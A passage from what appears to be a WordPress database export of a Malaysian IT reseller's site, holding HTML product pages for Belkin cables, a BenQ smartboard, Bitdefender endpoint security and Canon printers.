matters.</h3>\n<p>The Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.</p>\n<p></p>\n<p></p>\n<p></p><center>[maxbutton id=\"1\" ]</center><p></p>\n<p></p>\n<h3>Product&nbsp; : -</h3>\n<table>\n<tbody>\n<tr>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong style=\"background-color: transparent; font-size: 0.875rem;\">3.1 USB-A to USB-Câ„¢ Cableï¼ˆUSB Type-Câ„¢ï¼‰</strong></p><p>\n<center>[maxbutton id=\"9\" ]</center><br></p><center></center></td>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.1000.1000.jpeg\" alt=\"\" width=\"1000\" height=\"1000\"></p>\n<p><strong>Ultra HD High Speed HDMIÂ® Cable</strong></p>\n<p></p><center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/372.png\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K/Ultra HD Compatible</strong></p>\n<center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-1.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>Mini DisplayPortTM to VGA</strong></p>\n<p></p>\n<p></p>\n<p></p><center></center><center>[maxbutton id=\"9\" ]</center></td>\n</tr>\n<tr>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-2.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>Micro HDMI Adapter</strong></p>\n<p></p>\n<p></p>\n<p></p><center></center><center></center><center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-3.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>USB A/B Device Cable * A/B DSTP</strong></p>\n<p></p>\n<p></p>\n<p></p><center></center><center></center><center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-4.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>3.5 mm Audio + Charge RockStarâ„¢</strong></p>\n<p></p>\n<p></p>\n<p></p><center></center><center></center><center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-5.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>USB-Câ„¢ to Gigabit Ethernet Adapter (USB Type-Câ„¢)</strong></p>\n<p></p>\n<p></p>\n<p></p><center></center><center></center><center>[maxbutton id=\"9\" ]</center><center></center></td>\n</tr>\n<tr>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-6.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>3.0 USB-Câ„¢ to USB-A Adapter (USB Type-Câ„¢)</strong></p>\n<p></p>\n<p></p>\n<p></p><center></center><center>[maxbutton id=\"9\" ]</center><center></center></td>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-7.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>USB-Câ„¢ to HDMIÂ® Adapter (USB Type-C)</strong></p>\n<p></p>\n<p></p>\n<p></p><center></center><center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/webdam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>USB-Câ„¢ to HDMIÂ® Adapter (supports Dolby Vision)</strong></p>\n<p></p>\n<p></p>\n<p></p><center></center><center>[maxbutton id=\"9\" ]</center><center></center></td>\n<td width=\"150\">\n<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-8.jpeg\" alt=\"\" width=\"372\" height=\"372\"></p>\n<p><strong>Lightning Audio + Charge RockStarâ„¢</strong></p>\n<p></p>\n<p></p>\n<p></p><center></center><center>[maxbutton id=\"9\" ]</center></td>\n</tr>\n</tbody>\n</table>','Belkin','','publish','closed','closed','','belkin','','','2019-09-24 14:21:01','2019-09-24 06:21:01','',0,'https://bintara.com.my/?page_id=1446',0,'page','',0),(1447,1,'2018-12-11 12:56:54','2018-12-11 04:56:54','<h3>BenQ Corporate Interactive Smartboard Touchscreen Display | RP704K 4K UHD 70â€™â€™</h3>		\n		<h4>4K UHD 70â€™â€™ Education Interactive Flat Panel Display | RP704K</h4><p><strong>Your Caring Mate for Enhanced Interactive Learning</strong></p><p><br />The RP704K is designed to tap into the dynamic possibilities of the classroom and help teachers build a healthy and engaging learning environment. Not only does it come with Germ-Resistant Screen, but the Smartboard RP704K also comes installed with proficient annotation tools for enhanced class participation. It is your ultimate interactive display to achieve a touch-enhanced, smooth and fun learning experience.</p>		\n										<img width=\"800\" height=\"487\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-1024x623.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-1024x623.png 1024w, https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-300x182.png 300w, https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-768x467.png 768w, https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1.png 1110w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>Create a Healthy Learning Environment for Students</h4>		\n										<img width=\"560\" height=\"258\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/edu-rp750k-21-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/edu-rp750k-21-1.png 560w, https://bintara.com.my/wp-content/uploads/2019/01/edu-rp750k-21-1-300x138.png 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n		<p><strong>Germ-Resistant Screen</strong><br />The Germ-Resistant Screen is empowered by a multilayer coating of the non-toxic, enduring nano ionic silver agent that kills most germs accumulating on screen surfaces and prevent cross-infection or epidemic in classrooms. The ionic silverâ€™s antimicrobial feature remains effective even after thorough cleaning or long periods of use.</p><p><strong>* TUV Test Confirmed</strong><br />TUV is the worldâ€™s leading inspection and verification company, providing internationally approved testing services to verify product quality and performance. Placing our trust TUVâ€™s best-in-class facilities and world-recognized integrity, we had their experts rigidly evaluate the screenâ€™s antimicrobial efficacy. Proved by the JIS Z 2801:2010 testing methods, the result shows that BenQâ€™s AG+ Screen can effectively restrain the microbial growth of Escherichia coli, Staphylococcus aureus and Pseudomonas aeruginosa. To maintain antimicrobial efficacy, please frequently wipe your touch screen with a clean, soft, lint-free cloth moisturized with a neutral detergent.</p><p><strong>Smart Eye-Care Solution</strong></p><p>The Smart Eye-Care solution can function intuitively with the help of the embedded motion sensor. For a smooth and comfortable viewing experience, RP704K will automatically activate Flicker-Free and Low Blue Light features by detecting the movement of users close to the screen.<br />*For Android devices, BenQâ€™s RP704K will automatically set screen backlight to a comfortable setting instead of switching to the Low Blue Light mode.</p><p><strong>TÃœV-Certified Low Blue Light Technology</strong></p><p>Blue light emissions from displays may cause adverse health effects such as macular degeneration or disrupted melatonin secretion. BenQâ€™s Low Blue Light technology minimizes blue light exposure and allows for healthier time spent in front of the display, helping you create the best and most comfortable viewing experience for you and your students.</p>		\n										<img width=\"642\" height=\"438\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/low-bluelight.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/low-bluelight.png 642w, https://bintara.com.my/wp-content/uploads/2019/01/low-bluelight-300x205.png 300w\" sizes=\"(max-width: 642px) 100vw, 642px\" />											\n										<img width=\"616\" height=\"395\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-interactive-flat-panel-eye-care-solution-1-before.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-interactive-flat-panel-eye-care-solution-1-before.png 616w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-interactive-flat-panel-eye-care-solution-1-before-300x192.png 300w\" sizes=\"(max-width: 616px) 100vw, 616px\" />											\n		<p><strong>Anti-Glare Display</strong></p><p>Screen glare can cause reflected images on the screen, making it challenging for students to see, take notes, and remain focused. The RP704Kâ€™s anti-glare glass surface can effectively reduce reflections, freeing students from excessive squinting with more legible text and clearer images, avoiding eye strain and facilitating more effective instruction.</p>		\n			<h4>EZWrite 4.1 : An Easy and Fun Annotation Solution</h4>		\n		<p><strong>Intelligent Handwriting Recognition</strong></p><p>The Smartboard RP704Kâ€™s handwriting recognition feature allows presenters to simultaneously convert written text, numbers, forms, and drawings into legible materials without having to switch modes while effectively facilitating smooth teaching flow.</p>		\n										<img width=\"560\" height=\"352\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-22.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-22.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-22-300x189.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n										<img width=\"510\" height=\"361\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-01.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-01.jpg 510w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-01-300x212.jpg 300w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p><strong>Wireless Solution for Seamless Collaboration</strong></p><p>InstaQShare is the software designed for seamless wireless presentation and collaboration during lectures. It allows the smooth streaming of visual, audio files and Full HD quality videos. Users can also mirror content from mobile devices, and invite up to 16 participants for seamless collaboration.</p><p><strong>20-Point Multi-Touch Interactivity</strong></p><p>As the leading pioneer on the market, the RP Series supports multi-touch capability up to 20 points, allowing more students to participate in a discussion and highly engaging activities at once.</p>		\n										<img width=\"510\" height=\"330\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-02.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-02.jpg 510w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-02-300x194.jpg 300w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n			<h4>Facilitate Teaching Flow with Friendly Design</h4>		\n										<img width=\"360\" height=\"333\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-08.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-08.png 360w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-08-300x278.png 300w\" sizes=\"(max-width: 360px) 100vw, 360px\" />											\n		<p><strong>Integrated Front-Facing Speaker and Pen Tray</strong></p><p>RP704K integrates the repositioned audio speakers with the screen-length pen tray. The two front-facing,16W speakers create better sound transmission and bring more audiovisual enjoyment to interactive learning. The pen tray offers a handy place to keep IFP stylus and other tools that help enrich and smoothen presentations, providing fast access and avoiding needless interruption.</p>		\n										<img width=\"360\" height=\"333\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-09.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-09.png 360w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-09-300x278.png 300w\" sizes=\"(max-width: 360px) 100vw, 360px\" />											\n		<p><strong>Account Management System for Personalized File Management</strong></p><p>BenQ\'s IFPs support multi-account management through NFC technology, which allows users to directly access their personal system-setting and folders by simply scanning ID cards with the built-in sensor, as well as easily lock screens when not in use. AMS also offers instant access to major cloud storage services without having to enter password.</p><p><strong>NFC Pen</strong></p><p>With a simple tap of the NFCPen at the sensor, you can instantly activate the EZWrite 4.1 annotation app, and begin to annotate with different colors. Built with NFC technology, the NFCPen is battery-free and doesn\'t require device pairing. It is also waterproof while being able to withstand long-term use.</p>		\n										<img width=\"360\" height=\"333\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-10.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-10.png 360w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-10-300x278.png 300w\" sizes=\"(max-width: 360px) 100vw, 360px\" />											\n										<img width=\"560\" height=\"352\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-04.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-04.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-04-300x189.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n		<p><strong>Front Buttons</strong> <br />The front buttons, including Power, Home, Back, Setting, and Volume, further enhance the convenience of using IFPs and help teachers easily control the pace of lectures.</p><p><strong>Instant Plug and Play</strong> <br />RP704K can save you from the hassles of complicated setup. Simply connect to a PC via USB and youâ€™re all set to deliver compelling IFP touch-enhanced lessons.</p><p><strong>Parental Control</strong> <br />BenQ IFPs come with website control feature that blocks certain websites by configuring proxy server settings, which is useful for preventing students from accessing inappropriate content.</p>		\n			<h4>Display Management Support</h4>		\n		<p><strong>Multiple Display Administrator (MDA)</strong></p><p>Multiple Display Administrator (MDA) allows school IT to remotely control the general display settings of IFPs and schedule their on/off times, which helps to create hassle-free maintenance.</p>		\n										<img width=\"560\" height=\"303\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-05.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-05.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-05-300x162.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n										<img width=\"560\" height=\"358\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-06.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-06.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-06-300x192.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n		<p><strong>EasySetting</strong></p><p>Install Androidâ„¢ apps for a selection of displays through the BenQ cloud server. EasySetting can save you from repetitive manual installation.</p><p><strong>Over-the-Air Update (OTA)</strong></p><p>Upgrade your displays with the latest BenQ firmware via BenQâ€™s OTA update support to keep them running smoothly at all times.</p>		\n										<img width=\"560\" height=\"355\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-07.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-07.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-07-300x190.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n		<p>[maxbutton id=\"1\" ]</p>','BenQ Corporate Interactive Smartboard Touchscreen Display | RP704K 4K UHD 70â€™â€™','','publish','closed','closed','','benq-rp704k-4k-uhd-70','','','2019-01-08 11:33:06','2019-01-08 03:33:06','',0,'https://bintara.com.my/?page_id=1447',0,'page','',0),(1448,1,'2018-12-11 12:57:07','2018-12-11 04:57:07','<h2>Protect Your Endpoints with Layered Next-Gen Security, now with EDR</h2><h3>Itâ€™s Time to Rethink Endpoint Security<br />Protect Endpoints</h3><p>Organizations around the globe are facing an era of increasingly sophisticated attacks with never before seen global outbreaks of cyber threats. With increasing complexity and mobility of endpoints but limited resources and security staff shortage, companies are falling behind. As a consequence over half of breaches start with a compromised endpoint. Itâ€™s time to rethink endpoint security! <br />Bitdefender developed GravityZone to be an effective defense for enterprise digital assets against the entire range of cyberthreats, from common ones to the most sophisticated cyberthreats. The industry leading prevention that relies on the accurate machine learning technologies and behavior analytics coupled with response automation and the new easy-to-use EDR, delivers un-paralleled protection and threat visibility while keeping the resources and capabilities requirements low.</p>		\n			<h2>Product</h2>		\n		<h3><strong>GravityZone Elite SuiteÂ </strong></h3><p>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.</p><h3><strong>GravityZone Ultra SuiteÂ </strong></h3><p>GravityZone Ultra integrates layered next-gen endpoint protection and easy-to-use EDR platform to accurately protect enterprises against even the most elusive cyber threats.</p><h3><strong>GravityZone Enterprise Security</strong></h3><p>Bitdefenderâ€™s Enterprise Security delivers layered next-gen security that consistently ranks first in independent tests. It leverages a single management platform to reduce the cost of building a trusted environment for all endpoints.</p><h2>Protect all devices</h2><h3>Anti Ransomware</h3><p>Ransomware has quickly become one of the most infectious and feared threats in business environments. Ironically, the main cost is not the ransom itself, but the business downtime it causes â€“ so it is not surprising that only a third of businesses believe they will recover from a ransomware attack without significant losses.</p><h3 id=\"products\">Products</h3><p>All Bitdefender endpoint solutions protect your enterprise endpoints against ransomware.</p><h3><strong>GravityZone Elite SuiteÂ </strong></h3><p>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.</p><h3><strong>GravityZone Security for Endpoints </strong></h3><p>Solution designed to protect on-premise deployments, delivering prevention, detection, remediation and visibility in a single modular platform.</p><h3><strong>GravityZone Advanced Business Security </strong></h3><p>Bundle of security features and solutions delivering layered protection, including: machine learning anti-malware, behavioral analysis, anti-ransomware, advanced anti-exploit, continuous monitoring of running processes and many more.</p><p>To discover more, please click the button below or contact us to discuss your needs.</p><center>[maxbutton id=\"1\" ]</center>','Bitdefender','','publish','closed','closed','','bitdefender','','','2019-09-24 14:55:02','2019-09-24 06:55:02','',0,'https://bintara.com.my/?page_id=1448',0,'page','',0),(1449,1,'2018-12-11 12:57:26','2018-12-11 04:57:26','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per 